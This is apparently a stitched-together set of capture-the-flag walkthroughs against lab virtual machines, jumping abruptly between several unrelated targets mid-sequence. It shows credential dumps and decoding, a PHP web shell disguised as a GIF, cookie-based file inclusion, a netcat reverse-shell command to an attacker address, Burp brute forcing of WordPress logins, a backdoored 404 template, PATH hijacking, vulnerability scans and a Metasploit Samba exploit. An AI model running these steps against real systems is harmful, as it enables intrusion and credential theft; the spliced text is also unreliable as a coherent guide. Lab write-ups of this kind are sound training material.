We are now logged in as peter. Lets see what all we can do here as a privileged user.
peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
Now we have the credentials to login to the MySQL server.
Lets try to login.
mysql -u root -h 192.168.56.101 -pH4u%QJ_H99
I got an error at first, but fixed the issue with a reboot of the VM.
Lets read the data now.
show databases;
Lets find the tables and the data inside them.
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.001 sec)
MySQL [Users]> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.005 sec)
Here, we have 3 users. Looks like the password is base64 encoded. Lets decode kent’s password.
It is JWzXuBJJNy.
Lets login as kent.
Lets try to upload a php shell.
Lets try to send this as jpg with Burp.
Change the filename to photo.gif, content type to image/gif and add GIF87a in the first line.
We can find our file location in response filed in Burp.
Our file is uploaded, but we cant read the file. But read the index.php through the above method.
Here, a ‘lang‘ cookie is added to load ‘en.lang.php‘ file.
Lets try changing the value to something else.
Go to Firefox Preferences > Web Developer > Storage. Add + button at the top right to add a cookie.
Cookie name: lang and value: ../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif
and now.
We got the file included.
Now lets open a reverse shell with netcat. Enter this command in the page.
nc -nv 192.168.18.99 4444 -e /bin/bash
We got a connection.
Now, We have the passwords for three users. Lets examine their home directories.
Nothing special here.
Mike’s password doesnt work. Letr try kane.
There is a file owned by mike. Lets open.
Ah! Couldnt read. What kind of file this is?
Executable. Lets try running.
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
This executable tries to read msg.txt from mike’s home directory. Means the executable cat have access to mike’s home directory and we don’t have. Right?
What about changing the PATH variable and running /bin/bash with the same privileges as cat? Let’s try.
There is a web server running on port 80. Lets have a look.
Cool, Lets do a directory scan with Gobuster.
root@kali:~# gobuster dir -u 192.168.18.96 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
We have wp-content, wp-admin and wp-login in the server. So we can guess that a WordPress installation is there.
Before that, lets have a look at robots.txt.
This robots file blocks fsocity.dic and key-1-of-3.txt.
fsocity.dic is a wordlist. Lets save it so that we can use that for fuzzing later.
This is key-1-of-3. That means we need to find 2 more keys.
Now we need to find the username and password. Go to the login page and try usual combinations.
Now lets try to find out usernames from our .dic file using Burpsuite.
Capture the request and send it to intruder.
Click clear and select the username field as position to insert the payload.
Now run this command to remove the repeating lines in the file fsocity.dic
sort fsocity.dic | uniq > test.txt
The first file is 6MB and our new file is just 94KB. Use this file as payload list in Burp.
Now load the file and start attack. The attack will be faster in paid versions of Burpsuite.
The usual response length is 4145 if the username is wrong. But then the username is elliot the response length is 4196. Lets try that in browser.
The username elliot is right. Now we need to find the password using the same method.
Get the login request, Send to intruder, and use the same file for fuzzing.
We got the password too. ER28-0652.
and logged in.
Now we need a reverse shell. Lets do that by editing a page template.
Visit the following page and select 404 Template.
http://192.168.18.96/wp-admin/theme-editor.php
This page is shown in case of a 404 error in this WordPress installation. If we add our backdoor script in this template and try to load a non-existing page, we can get a reverse shell. Paste the contents of following file there.
Set attack type to ‘pitchfork‘ and make sure that the email and password fields are selected.
Now, Go to payloads and load the payload list we downloaded to first and second payloads.
and click Start Attack.
When the attack goes on, we can notice the response length of some requests are 231 and some are 1838. The ones with 1838 are the ones we want. They are successful logins.
Here lets try '-' as email and password.
and, we’re in!
We have the SSH login credentials now. Lets try logging in.
Its not getting connected. But remember, we have a Squid proxy opened on port 3128.
Lets try connecting through it.
add the following line to /etc/proxychains.conf
http 192.168.18.94 3128
Now, lets try connecting to the machine.
We logged in to the server, and logged out automatically. lets try running a command upon login.
root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.28:
| CVE-2013-4559 7.6 https://vulners.com/cve/CVE-2013-4559
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2013-4508 5.8 https://vulners.com/cve/CVE-2013-4508
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
| CVE-2011-4362 5.0 https://vulners.com/cve/CVE-2011-4362
|_ CVE-2013-4560 2.6 https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.04 ms 192.168.18.90
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds
We have nothing interesting in index.php.
but there is a page /test
Lets use CURL and check allowed HTTP Options.
curl -v -X OPTIONS http://192.168.18.90/test
Here PUT is allowed. Lets try uploading a php shell there.
Lets run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.
root@kali:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open domain dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:thekelleys:dnsmasq:2.75:
| CVE-2019-14513 5.0 https://vulners.com/cve/CVE-2019-14513
|_ CVE-2019-14834 4.3 https://vulners.com/cve/CVE-2019-14834
80/tcp open http PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.18.85
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds
Didnt find anything interesting from the port 80 web page, nikto and gobuster scan.
samba is running on port 139. Lets try to exploit it before going to ftp.
msfconsole
msf5 > msf5 > use exploit/linux/samba/is_known_pipename